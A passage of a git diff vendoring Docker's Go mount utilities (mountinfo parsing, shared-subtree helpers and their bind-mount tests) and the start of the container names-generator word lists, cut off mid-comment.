/var/lib/docker/aufs/mnt/ff28c27d5f894363993622de26d5dd352dba072f219e4691d6498c19bbbc15a9 rw,relatime - aufs none rw,si=9b4a7642265b339c +289 15 0:3634 / /var/lib/docker/aufs/mnt/aa128fe0e64fdede333aa48fd9de39530c91a9244a0f0649a3c411c61e372daa rw,relatime - aufs none rw,si=9b4a764012ada39c +99 15 8:33 / /media/REMOVE\040ME rw,nosuid,nodev,relatime - fuseblk /dev/sdc1 rw,user_id=0,group_id=0,allow_other,blksize=4096` +) + +func TestParseFedoraMountinfo(t *testing.T) { + r := bytes.NewBuffer([]byte(fedoraMountinfo)) + _, err := parseInfoFile(r) + if err != nil { + t.Fatal(err) + } +} + +func TestParseUbuntuMountinfo(t *testing.T) { + r := bytes.NewBuffer([]byte(ubuntuMountInfo)) + _, err := parseInfoFile(r) + if err != nil { + t.Fatal(err) + } +} + +func TestParseGentooMountinfo(t *testing.T) { + r := bytes.NewBuffer([]byte(gentooMountinfo)) + _, err := parseInfoFile(r) + if err != nil { + t.Fatal(err) + } +} + +func TestParseFedoraMountinfoFields(t *testing.T) { + r := bytes.NewBuffer([]byte(fedoraMountinfo)) + infos, err := parseInfoFile(r) + if err != nil { + t.Fatal(err) + } + expectedLength := 58 + if len(infos) != expectedLength { + t.Fatalf("Expected %d entries, got %d", expectedLength, len(infos)) + } + mi := Info{ + ID: 15, + Parent: 35, + Major: 0, + Minor: 3, + Root: "/", + Mountpoint: "/proc", + Opts: "rw,nosuid,nodev,noexec,relatime", + Optional: "shared:5", + Fstype: "proc", + Source: "proc", + VfsOpts: "rw", + } + + if *infos[0] != mi { + t.Fatalf("expected %#v, got %#v", mi, infos[0]) + } +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go new file mode 100644 index 0000000000..ad9ab57f8b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go @@ -0,0 +1,37 @@ +// +build solaris,cgo + +package mount + +/* +#include +#include +*/ +import "C" + +import ( + "fmt" +) + +func parseMountTable() ([]*Info, error) { + mnttab := C.fopen(C.CString(C.MNTTAB), C.CString("r")) + if mnttab == nil { + return nil, fmt.Errorf("Failed to open %s", C.MNTTAB) + } + + var out []*Info + var mp C.struct_mnttab + + ret := C.getmntent(mnttab, &mp) + for ret == 0 { + var mountinfo Info + mountinfo.Mountpoint = C.GoString(mp.mnt_mountp) + mountinfo.Source = C.GoString(mp.mnt_special) + mountinfo.Fstype = C.GoString(mp.mnt_fstype) + mountinfo.Opts = C.GoString(mp.mnt_mntopts) + out = append(out, &mountinfo) + ret = C.getmntent(mnttab, &mp) + } + + C.fclose(mnttab) + return out, nil +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go new file mode 100644 index 0000000000..7fbcf19214 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go @@ -0,0 +1,12 @@ +// +build !windows,!linux,!freebsd,!solaris freebsd,!cgo solaris,!cgo + +package mount + +import ( + "fmt" + "runtime" +) + +func parseMountTable() ([]*Info, error) { + return nil, fmt.Errorf("mount.parseMountTable is not implemented on %s/%s", runtime.GOOS, runtime.GOARCH) +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go new file mode 100644 index 0000000000..dab8a37ed0 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go @@ -0,0 +1,6 @@ +package mount + +func parseMountTable() ([]*Info, error) { + // Do NOT return an error! + return nil, nil +} diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go new file mode 100644 index 0000000000..8ceec84bc6 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go @@ -0,0 +1,69 @@ +// +build linux + +package mount + +// MakeShared ensures a mounted filesystem has the SHARED mount option enabled. +// See the supported options in flags.go for further reference. +func MakeShared(mountPoint string) error { + return ensureMountedAs(mountPoint, "shared") +} + +// MakeRShared ensures a mounted filesystem has the RSHARED mount option enabled. +// See the supported options in flags.go for further reference. +func MakeRShared(mountPoint string) error { + return ensureMountedAs(mountPoint, "rshared") +} + +// MakePrivate ensures a mounted filesystem has the PRIVATE mount option enabled. +// See the supported options in flags.go for further reference. +func MakePrivate(mountPoint string) error { + return ensureMountedAs(mountPoint, "private") +} + +// MakeRPrivate ensures a mounted filesystem has the RPRIVATE mount option +// enabled. See the supported options in flags.go for further reference. +func MakeRPrivate(mountPoint string) error { + return ensureMountedAs(mountPoint, "rprivate") +} + +// MakeSlave ensures a mounted filesystem has the SLAVE mount option enabled. +// See the supported options in flags.go for further reference. +func MakeSlave(mountPoint string) error { + return ensureMountedAs(mountPoint, "slave") +} + +// MakeRSlave ensures a mounted filesystem has the RSLAVE mount option enabled. +// See the supported options in flags.go for further reference. +func MakeRSlave(mountPoint string) error { + return ensureMountedAs(mountPoint, "rslave") +} + +// MakeUnbindable ensures a mounted filesystem has the UNBINDABLE mount option +// enabled. See the supported options in flags.go for further reference. +func MakeUnbindable(mountPoint string) error { + return ensureMountedAs(mountPoint, "unbindable") +} + +// MakeRUnbindable ensures a mounted filesystem has the RUNBINDABLE mount +// option enabled. See the supported options in flags.go for further reference. +func MakeRUnbindable(mountPoint string) error { + return ensureMountedAs(mountPoint, "runbindable") +} + +func ensureMountedAs(mountPoint, options string) error { + mounted, err := Mounted(mountPoint) + if err != nil { + return err + } + + if !mounted { + if err := Mount(mountPoint, mountPoint, "none", "bind,rw"); err != nil { + return err + } + } + if _, err = Mounted(mountPoint); err != nil { + return err + } + + return ForceMount("", mountPoint, "none", options) +} diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go new file mode 100644 index 0000000000..c1837942e3 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go @@ -0,0 +1,331 @@ +// +build linux + +package mount + +import ( + "os" + "path" + "syscall" + "testing" +) + +// nothing is propagated in or out +func TestSubtreePrivate(t *testing.T) { + tmp := path.Join(os.TempDir(), "mount-tests") + if err := os.MkdirAll(tmp, 0777); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + var ( + sourceDir = path.Join(tmp, "source") + targetDir = path.Join(tmp, "target") + outside1Dir = path.Join(tmp, "outside1") + outside2Dir = path.Join(tmp, "outside2") + + outside1Path = path.Join(outside1Dir, "file.txt") + outside2Path = path.Join(outside2Dir, "file.txt") + outside1CheckPath = path.Join(targetDir, "a", "file.txt") + outside2CheckPath = path.Join(sourceDir, "b", "file.txt") + ) + if err := os.MkdirAll(path.Join(sourceDir, "a"), 0777); err != nil { + t.Fatal(err) + } + if err := os.MkdirAll(path.Join(sourceDir, "b"), 0777); err != nil { + t.Fatal(err) + } + if err := os.Mkdir(targetDir, 0777); err != nil { + t.Fatal(err) + } + if err := os.Mkdir(outside1Dir, 0777); err != nil { + t.Fatal(err) + } + if err := os.Mkdir(outside2Dir, 0777); err != nil { + t.Fatal(err) + } + + if err := createFile(outside1Path); err != nil { + t.Fatal(err) + } + if err := createFile(outside2Path); err != nil { + t.Fatal(err) + } + + // mount the shared directory to a target + if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(targetDir); err != nil { + t.Fatal(err) + } + }() + + // next, make the target private + if err := MakePrivate(targetDir); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(targetDir); err != nil { + t.Fatal(err) + } + }() + + // mount in an outside path to a mounted path inside the _source_ + if err := Mount(outside1Dir, path.Join(sourceDir, "a"), "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(path.Join(sourceDir, "a")); err != nil { + t.Fatal(err) + } + }() + + // check that this file _does_not_ show in the _target_ + if _, err := os.Stat(outside1CheckPath); err != nil && !os.IsNotExist(err) { + t.Fatal(err) + } else if err == nil { + t.Fatalf("%q should not be visible, but is", outside1CheckPath) + } + + // next mount outside2Dir into the _target_ + if err := Mount(outside2Dir, path.Join(targetDir, "b"), "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(path.Join(targetDir, "b")); err != nil { + t.Fatal(err) + } + }() + + // check that this file _does_not_ show in the _source_ + if _, err := os.Stat(outside2CheckPath); err != nil && !os.IsNotExist(err) { + t.Fatal(err) + } else if err == nil { + t.Fatalf("%q should not be visible, but is", outside2CheckPath) + } +} + +// Testing that when a target is a shared mount, +// then child mounts propagate to the source +func TestSubtreeShared(t *testing.T) { + tmp := path.Join(os.TempDir(), "mount-tests") + if err := os.MkdirAll(tmp, 0777); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + var ( + sourceDir = path.Join(tmp, "source") + targetDir = path.Join(tmp, "target") + outsideDir = path.Join(tmp, "outside") + + outsidePath = path.Join(outsideDir, "file.txt") + sourceCheckPath = path.Join(sourceDir, "a", "file.txt") + ) + + if err := os.MkdirAll(path.Join(sourceDir, "a"), 0777); err != nil { + t.Fatal(err) + } + if err := os.Mkdir(targetDir, 0777); err != nil { + t.Fatal(err) + } + if err := os.Mkdir(outsideDir, 0777); err != nil { + t.Fatal(err) + } + + if err := createFile(outsidePath); err != nil { + t.Fatal(err) + } + + // mount the source as shared + if err := MakeShared(sourceDir); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(sourceDir); err != nil { + t.Fatal(err) + } + }() + + // mount the shared directory to a target + if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(targetDir); err != nil { + t.Fatal(err) + } + }() + + // mount in an outside path to a mounted path inside the target + if err := Mount(outsideDir, path.Join(targetDir, "a"), "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(path.Join(targetDir, "a")); err != nil { + t.Fatal(err) + } + }() + + // NOW, check that the file from the outside directory is available in the source directory + if _, err := os.Stat(sourceCheckPath); err != nil { + t.Fatal(err) + } +} + +// testing that mounts to a shared source show up in the slave target, +// and that mounts into a slave target do _not_ show up in the shared source +func TestSubtreeSharedSlave(t *testing.T) { + tmp := path.Join(os.TempDir(), "mount-tests") + if err := os.MkdirAll(tmp, 0777); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + var ( + sourceDir = path.Join(tmp, "source") + targetDir = path.Join(tmp, "target") + outside1Dir = path.Join(tmp, "outside1") + outside2Dir = path.Join(tmp, "outside2") + + outside1Path = path.Join(outside1Dir, "file.txt") + outside2Path = path.Join(outside2Dir, "file.txt") + outside1CheckPath = path.Join(targetDir, "a", "file.txt") + outside2CheckPath = path.Join(sourceDir, "b", "file.txt") + ) + if err := os.MkdirAll(path.Join(sourceDir, "a"), 0777); err != nil { + t.Fatal(err) + } + if err := os.MkdirAll(path.Join(sourceDir, "b"), 0777); err != nil { + t.Fatal(err) + } + if err := os.Mkdir(targetDir, 0777); err != nil { + t.Fatal(err) + } + if err := os.Mkdir(outside1Dir, 0777); err != nil { + t.Fatal(err) + } + if err := os.Mkdir(outside2Dir, 0777); err != nil { + t.Fatal(err) + } + + if err := createFile(outside1Path); err != nil { + t.Fatal(err) + } + if err := createFile(outside2Path); err != nil { + t.Fatal(err) + } + + // mount the source as shared + if err := MakeShared(sourceDir); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(sourceDir); err != nil { + t.Fatal(err) + } + }() + + // mount the shared directory to a target + if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(targetDir); err != nil { + t.Fatal(err) + } + }() + + // next, make the target slave + if err := MakeSlave(targetDir); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(targetDir); err != nil { + t.Fatal(err) + } + }() + + // mount in an outside path to a mounted path inside the _source_ + if err := Mount(outside1Dir, path.Join(sourceDir, "a"), "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(path.Join(sourceDir, "a")); err != nil { + t.Fatal(err) + } + }() + + // check that this file _does_ show in the _target_ + if _, err := os.Stat(outside1CheckPath); err != nil { + t.Fatal(err) + } + + // next mount outside2Dir into the _target_ + if err := Mount(outside2Dir, path.Join(targetDir, "b"), "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(path.Join(targetDir, "b")); err != nil { + t.Fatal(err) + } + }() + + // check that this file _does_not_ show in the _source_ + if _, err := os.Stat(outside2CheckPath); err != nil && !os.IsNotExist(err) { + t.Fatal(err) + } else if err == nil { + t.Fatalf("%q should not be visible, but is", outside2CheckPath) + } +} + +func TestSubtreeUnbindable(t *testing.T) { + tmp := path.Join(os.TempDir(), "mount-tests") + if err := os.MkdirAll(tmp, 0777); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + var ( + sourceDir = path.Join(tmp, "source") + targetDir = path.Join(tmp, "target") + ) + if err := os.MkdirAll(sourceDir, 0777); err != nil { + t.Fatal(err) + } + if err := os.MkdirAll(targetDir, 0777); err != nil { + t.Fatal(err) + } + + // next, make the source unbindable + if err := MakeUnbindable(sourceDir); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(sourceDir); err != nil { + t.Fatal(err) + } + }() + + // then attempt to mount it to target. It should fail + if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil && err != syscall.EINVAL { + t.Fatal(err) + } else if err == nil { + t.Fatalf("%q should not have been bindable", sourceDir) + } + defer func() { + if err := Unmount(targetDir); err != nil { + t.Fatal(err) + } + }() +} + +func createFile(path string) error { + f, err := os.Create(path) + if err != nil { + return err + } + f.WriteString("hello world!") + return f.Close() +} diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go new file mode 100644 index 0000000000..09f6b03cbc --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go @@ -0,0 +1,58 @@ +// +build solaris + +package mount + +// MakeShared ensures a mounted filesystem has the SHARED mount option enabled. +// See the supported options in flags.go for further reference. +func MakeShared(mountPoint string) error { + return ensureMountedAs(mountPoint, "shared") +} + +// MakeRShared ensures a mounted filesystem has the RSHARED mount option enabled. +// See the supported options in flags.go for further reference. +func MakeRShared(mountPoint string) error { + return ensureMountedAs(mountPoint, "rshared") +} + +// MakePrivate ensures a mounted filesystem has the PRIVATE mount option enabled. +// See the supported options in flags.go for further reference. +func MakePrivate(mountPoint string) error { + return ensureMountedAs(mountPoint, "private") +} + +// MakeRPrivate ensures a mounted filesystem has the RPRIVATE mount option +// enabled. See the supported options in flags.go for further reference. +func MakeRPrivate(mountPoint string) error { + return ensureMountedAs(mountPoint, "rprivate") +} + +// MakeSlave ensures a mounted filesystem has the SLAVE mount option enabled. +// See the supported options in flags.go for further reference. +func MakeSlave(mountPoint string) error { + return ensureMountedAs(mountPoint, "slave") +} + +// MakeRSlave ensures a mounted filesystem has the RSLAVE mount option enabled. +// See the supported options in flags.go for further reference. +func MakeRSlave(mountPoint string) error { + return ensureMountedAs(mountPoint, "rslave") +} + +// MakeUnbindable ensures a mounted filesystem has the UNBINDABLE mount option +// enabled. See the supported options in flags.go for further reference. +func MakeUnbindable(mountPoint string) error { + return ensureMountedAs(mountPoint, "unbindable") +} + +// MakeRUnbindable ensures a mounted filesystem has the RUNBINDABLE mount +// option enabled. See the supported options in flags.go for further reference. +func MakeRUnbindable(mountPoint string) error { + return ensureMountedAs(mountPoint, "runbindable") +} + +func ensureMountedAs(mountPoint, options string) error { + // TODO: Solaris does not support bind mounts. + // Evaluate lofs and also look at the relevant + // mount flags to be supported. + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go b/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go new file mode 100644 index 0000000000..18a939b70b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go @@ -0,0 +1,11 @@ +package main + +import ( + "fmt" + + "github.com/docker/docker/pkg/namesgenerator" +) + +func main() { + fmt.Println(namesgenerator.GetRandomName(0)) +} diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go new file mode 100644 index 0000000000..cfb8157d69 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go @@ -0,0 +1,590 @@ +package namesgenerator + +import ( + "fmt" + + "github.com/docker/docker/pkg/random" +) + +var ( + left = [...]string{ + "admiring", + "adoring", + "affectionate", + "agitated", + "amazing", + "angry", + "awesome", + "blissful", + "boring", + "brave", + "clever", + "cocky", + "compassionate", + "competent", + "condescending", + "confident", + "cranky", + "dazzling", + "determined", + "distracted", + "dreamy", + "eager", + "ecstatic", + "elastic", + "elated", + "elegant", + "eloquent", + "epic", + "fervent", + "festive", + "flamboyant", + "focused", + "friendly", + "frosty", + "gallant", + "gifted", + "goofy", + "gracious", + "happy", + "hardcore", + "heuristic", + "hopeful", + "hungry", + "infallible", + "inspiring", + "jolly", + "jovial", + "keen", + "kickass", + "kind", + "laughing", + "loving", + "lucid", + "mystifying", + "modest", + "musing", + "naughty", + "nervous", + "nifty", + "nostalgic", + "objective", + "optimistic", + "peaceful", + "pedantic", + "pensive", + "practical", + "priceless", + "quirky", + "quizzical", + "relaxed", + "reverent", + "romantic", + "sad", + "serene", + "sharp", + "silly", + "sleepy", + "stoic", + "stupefied", + "suspicious", + "tender", + "thirsty", + "trusting", + "unruffled", + "upbeat", + "vibrant", + "vigilant", + "wizardly", + "wonderful", + "xenodochial", + "youthful", + "zealous", + "zen", + } + + // Docker, starting from 0.7.x, generates names from notable scientists and hackers. + // Please, for any amazing man that you add to the list, consider adding an equally amazing woman to it, and vice versa. + right = [...]string{ + // Muhammad ibn Jābir al-Ḥarrānī al-Battānī was a founding father of astronomy. https://en.wikipedia.org/wiki/Mu%E1%B8%A5ammad_ibn_J%C4%81bir_al-%E1%B8%A4arr%C4%81n%C4%AB_al-Batt%C4%81n%C4%AB + "albattani", + + // Frances E. Allen, became the first female IBM Fellow in 1989. In 2006, she became the first female recipient of the ACM's Turing Award. https://en.wikipedia.org/wiki/Frances_E._Allen + "allen", + + // June Almeida - Scottish virologist who took the first pictures of the rubella virus - https://en.wikipedia.org/wiki/June_Almeida + "almeida", + + // Maria Gaetana Agnesi - Italian mathematician, philosopher, theologian and humanitarian. She was the first woman to write a mathematics handbook and the first woman appointed as a Mathematics Professor at a University. https://en.wikipedia.org/wiki/Maria_Gaetana_Agnesi + "agnesi", + + // Archimedes was a physicist, engineer and mathematician who invented too many things to list them here. https://en.wikipedia.org/wiki/Archimedes + "archimedes", + + // Maria Ardinghelli - Italian translator, mathematician and physicist - https://en.wikipedia.org/wiki/Maria_Ardinghelli + "ardinghelli", + + // Aryabhata - Ancient Indian mathematician-astronomer during 476-550 CE https://en.wikipedia.org/wiki/Aryabhata + "aryabhata", + + // Wanda Austin - Wanda Austin is the President and CEO of The Aerospace Corporation, a leading architect for the US security space programs. https://en.wikipedia.org/wiki/Wanda_Austin + "austin", + + // Charles Babbage invented the concept of a programmable computer. https://en.wikipedia.org/wiki/Charles_Babbage. + "babbage", + + // Stefan Banach - Polish mathematician, was one of the founders of modern functional analysis. https://en.wikipedia.org/wiki/Stefan_Banach + "banach", + + // John Bardeen co-invented the transistor - https://en.wikipedia.org/wiki/John_Bardeen + "bardeen", + + // Jean Bartik, born Betty Jean Jennings, was one of the original programmers for the ENIAC computer. https://en.wikipedia.org/wiki/Jean_Bartik + "bartik", + + // Laura Bassi, the world's first female professor https://en.wikipedia.org/wiki/Laura_Bassi + "bassi", + + // Hugh Beaver, British engineer, founder of the Guinness Book of World Records https://en.wikipedia.org/wiki/Hugh_Beaver + "beaver", + + // Alexander Graham Bell - an eminent Scottish-born scientist, inventor, engineer and innovator who is credited with inventing the first practical telephone - https://en.wikipedia.org/wiki/Alexander_Graham_Bell + "bell", + + // Homi J Bhabha - was an Indian nuclear physicist, founding director, and professor of physics at the Tata Institute of Fundamental Research. Colloquially known as "father of Indian nuclear programme"- https://en.wikipedia.org/wiki/Homi_J._Bhabha + "bhabha", + + // Bhaskara II - Ancient Indian mathematician-astronomer whose work on calculus predates Newton and Leibniz by over half a millennium - https://en.wikipedia.org/wiki/Bh%C4%81skara_II#Calculus + "bhaskara", + + // Elizabeth Blackwell - American doctor and first American woman to receive a medical degree - https://en.wikipedia.org/wiki/Elizabeth_Blackwell + "blackwell", + + // Niels Bohr is the father of quantum theory. https://en.wikipedia.org/wiki/Niels_Bohr. + "bohr", + + // Kathleen Booth, she's credited with writing the first assembly language. https://en.wikipedia.org/wiki/Kathleen_Booth + "booth", + + // Anita Borg - Anita Borg was the founding director of the Institute for Women and Technology (IWT). https://en.wikipedia.org/wiki/Anita_Borg + "borg", + + // Satyendra Nath Bose - He provided the foundation for Bose–Einstein statistics and the theory of the Bose–Einstein condensate. - https://en.wikipedia.org/wiki/Satyendra_Nath_Bose + "bose", + + // Evelyn Boyd Granville - She was one of the first African-American woman to receive a Ph.D. in mathematics; she earned it in 1949 from Yale University. https://en.wikipedia.org/wiki/Evelyn_Boyd_Granville + "boyd", + + // Brahmagupta - Ancient Indian mathematician during 598-670 CE who gave rules to compute with zero - https://en.wikipedia.org/wiki/Brahmagupta#Zero + "brahmagupta", + + // Walter Houser Brattain co-invented the transistor - https://en.wikipedia.org/wiki/Walter_Houser_Brattain + "brattain", + + // Emmett Brown invented time travel. https://en.wikipedia.org/wiki/Emmett_Brown (thanks Brian Goff) + "brown", + + // Rachel Carson - American marine biologist and conservationist, her book Silent Spring and other writings are credited with advancing the global environmental movement. https://en.wikipedia.org/wiki/Rachel_Carson + "carson", + + // Subrahmanyan Chandrasekhar - Astrophysicist known for his mathematical theory on different stages and evolution in structures of the stars. He has won nobel prize for physics - https://en.wikipedia.org/wiki/Subrahmanyan_Chandrasekhar + "chandrasekhar", + + //Claude Shannon - The father of information theory and founder of digital circuit design theory. (https://en.wikipedia.org/wiki/Claude_Shannon) + "shannon", + + // Joan Clarke - Bletchley Park code breaker during the Second World War who pioneered techniques that remained top secret for decades. Also an accomplished numismatist https://en.wikipedia.org/wiki/Joan_Clarke + "clarke", + + // Jane Colden - American botanist widely considered the first female American botanist - https://en.wikipedia.org/wiki/Jane_Colden + "colden", + + // Gerty Theresa Cori - American biochemist who became the third woman—and first American woman—to win a Nobel Prize in science, and the first woman to be awarded the Nobel Prize in Physiology or Medicine. Cori was born in Prague. https://en.wikipedia.org/wiki/Gerty_Cori + "cori", + + // Seymour Roger Cray was an American electrical engineer and supercomputer architect who designed a series of computers that were the fastest in the world for decades. https://en.wikipedia.org/wiki/Seymour_Cray + "cray", + + // This entry reflects a husband and wife team who worked together: + // Joan Curran was a Welsh scientist who developed radar and invented chaff, a radar countermeasure. https://en.wikipedia.org/wiki/Joan_Curran + // Samuel Curran was an Irish physicist who worked alongside his wife during WWII and invented the proximity fuse. https://en.wikipedia.org/wiki/Samuel_Curran + "curran", + + // Marie Curie discovered radioactivity. https://en.wikipedia.org/wiki/Marie_Curie. + "curie", + + // Charles Darwin established the principles of natural evolution. https://en.wikipedia.org/wiki/Charles_Darwin. + "darwin", + + // Leonardo Da Vinci invented too many things to list here. https://en.wikipedia.org/wiki/Leonardo_da_Vinci. + "davinci", + + // Edsger Wybe Dijkstra was a Dutch computer scientist and mathematical scientist. https://en.wikipedia.org/wiki/Edsger_W._Dijkstra. + "dijkstra", + + // Donna Dubinsky - played an integral role in the development of personal digital assistants (PDAs) serving as CEO of Palm, Inc. and co-founding Handspring. https://en.wikipedia.org/wiki/Donna_Dubinsky + "dubinsky", + + // Annie Easley - She was a leading member of the team which developed software for the Centaur rocket stage and one of the first African-Americans in her field. https://en.wikipedia.org/wiki/Annie_Easley + "easley", + + // Thomas Alva Edison, prolific inventor https://en.wikipedia.org/wiki/Thomas_Edison + "edison", + + // Albert Einstein invented the general theory of relativity. https://en.wikipedia.org/wiki/Albert_Einstein + "einstein", + + // Gertrude Elion - American biochemist, pharmacologist and the 1988 recipient of the Nobel Prize in Medicine - https://en.wikipedia.org/wiki/Gertrude_Elion + "elion", + + // Douglas Engelbart gave the mother of all demos: https://en.wikipedia.org/wiki/Douglas_Engelbart + "engelbart", + + // Euclid invented geometry. https://en.wikipedia.org/wiki/Euclid + "euclid", + + // Leonhard Euler invented large parts of modern mathematics. https://de.wikipedia.org/wiki/Leonhard_Euler + "euler", + + // Pierre de Fermat pioneered several aspects of modern mathematics. https://en.wikipedia.org/wiki/Pierre_de_Fermat + "fermat", + + // Enrico Fermi invented the first nuclear reactor. https://en.wikipedia.org/wiki/Enrico_Fermi. + "fermi", + + // Richard Feynman was a key contributor to quantum mechanics and particle physics. https://en.wikipedia.org/wiki/Richard_Feynman + "feynman", + + // Benjamin Franklin is famous for his experiments in electricity and the invention of the lightning rod. + "franklin", + + // Galileo was a founding father of modern astronomy, and faced politics and obscurantism to establish scientific truth. https://en.wikipedia.org/wiki/Galileo_Galilei + "galileo", + + // William Henry "Bill" Gates III is an American business magnate, philanthropist, investor, computer programmer, and inventor. https://en.wikipedia.org/wiki/Bill_Gates + "gates", + + // Adele Goldberg, was one of the designers and developers of the Smalltalk language. https://en.wikipedia.org/wiki/Adele_Goldberg_(computer_scientist) + "goldberg", + + // Adele Goldstine, born Adele Katz, wrote the complete technical description for the first electronic digital computer, ENIAC. https://en.wikipedia.org/wiki/Adele_Goldstine + "goldstine", + + // Shafi Goldwasser is a computer scientist known for creating theoretical foundations of modern cryptography. Winner of 2012 ACM Turing Award. https://en.wikipedia.org/wiki/Shafi_Goldwasser + "goldwasser", + + // James Golick, all around gangster. + "golick", + + // Jane Goodall - British primatologist, ethologist, and anthropologist who is considered to be the world's foremost expert on chimpanzees - https://en.wikipedia.org/wiki/Jane_Goodall + "goodall", + + // Lois Haibt - American computer scientist, part of the team at IBM that developed FORTRAN - https://en.wikipedia.org/wiki/Lois_Haibt + "haibt", + + // Margaret Hamilton - Director of the Software Engineering Division of the MIT Instrumentation Laboratory, which developed on-board flight software for the Apollo space program. https://en.wikipedia.org/wiki/Margaret_Hamilton_(scientist) + "hamilton", + + // Stephen Hawking pioneered the field of cosmology by combining general relativity and quantum mechanics. https://en.wikipedia.org/wiki/Stephen_Hawking + "hawking", + + // Werner Heisenberg was a founding father of quantum mechanics. https://en.wikipedia.org/wiki/Werner_Heisenberg + "heisenberg", + + // Jaroslav Heyrovský was the inventor of the polarographic method, father of the electroanalytical method, and recipient of the Nobel Prize in 1959. His main field of work was polarography. https://en.wikipedia.org/wiki/Jaroslav_Heyrovsk%C3%BD + "heyrovsky", + + // Dorothy Hodgkin was a British biochemist, credited with the development of protein crystallography. She was awarded the Nobel Prize in Chemistry in 1964. https://en.wikipedia.org/wiki/Dorothy_Hodgkin + "hodgkin", + + // Erna Schneider Hoover revolutionized modern communication by inventing a computerized telephone switching method. https://en.wikipedia.org/wiki/Erna_Schneider_Hoover + "hoover", + + // Grace Hopper developed the first compiler for a computer programming language and is credited with popularizing the term "debugging" for fixing computer glitches. https://en.wikipedia.org/wiki/Grace_Hopper + "hopper", + + // Frances Hugle, she was an American scientist, engineer, and inventor who contributed to the understanding of semiconductors, integrated circuitry, and the unique electrical principles of microscopic materials. https://en.wikipedia.org/wiki/Frances_Hugle + "hugle", + + // Hypatia - Greek Alexandrine Neoplatonist philosopher in Egypt who was one of the earliest mothers of mathematics - https://en.wikipedia.org/wiki/Hypatia + "hypatia", + + // Yeong-Sil Jang was a Korean scientist and astronomer during the Joseon Dynasty; he invented the first metal printing press and water gauge. https://en.wikipedia.org/wiki/Jang_Yeong-sil + "jang", + + // Betty Jennings - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Jean_Bartik + "jennings", + + // Mary Lou Jepsen, was the founder and chief technology officer of One Laptop Per Child (OLPC), and the founder of Pixel Qi. https://en.wikipedia.org/wiki/Mary_Lou_Jepsen + "jepsen", + + // Irène Joliot-Curie - French scientist who was awarded the Nobel Prize for Chemistry in 1935. Daughter of Marie and Pierre Curie. https://en.wikipedia.org/wiki/Ir%C3%A8ne_Joliot-Curie + "joliot", + + // Karen Spärck Jones came up with the concept of inverse document frequency, which is used in most search engines today. https://en.wikipedia.org/wiki/Karen_Sp%C3%A4rck_Jones + "jones", + + // A. P. J. Abdul Kalam - is an Indian scientist aka Missile Man of India for his work on the development of ballistic missile and launch vehicle technology - https://en.wikipedia.org/wiki/A._P._J._Abdul_Kalam + "kalam", + + // Susan Kare, created the icons and many of the interface elements for the original Apple Macintosh in the 1980s, and was an original employee of NeXT, working as the Creative Director. https://en.wikipedia.org/wiki/Susan_Kare + "kare", + + // Mary Kenneth Keller, Sister Mary Kenneth Keller became the first American woman to earn a PhD in Computer Science in 1965. https://en.wikipedia.org/wiki/Mary_Kenneth_Keller + "keller", + + // Har Gobind Khorana - Indian-American biochemist who shared the 1968 Nobel Prize for Physiology - https://en.wikipedia.org/wiki/Har_Gobind_Khorana + "khorana", + + // Jack Kilby invented silicone integrated circuits and gave Silicon Valley its name. - https://en.wikipedia.org/wiki/Jack_Kilby + "kilby", + + // Maria Kirch - German astronomer and first woman to discover a comet - https://en.wikipedia.org/wiki/Maria_Margarethe_Kirch + "kirch", + + // Donald Knuth - American computer scientist, author of "The Art of Computer 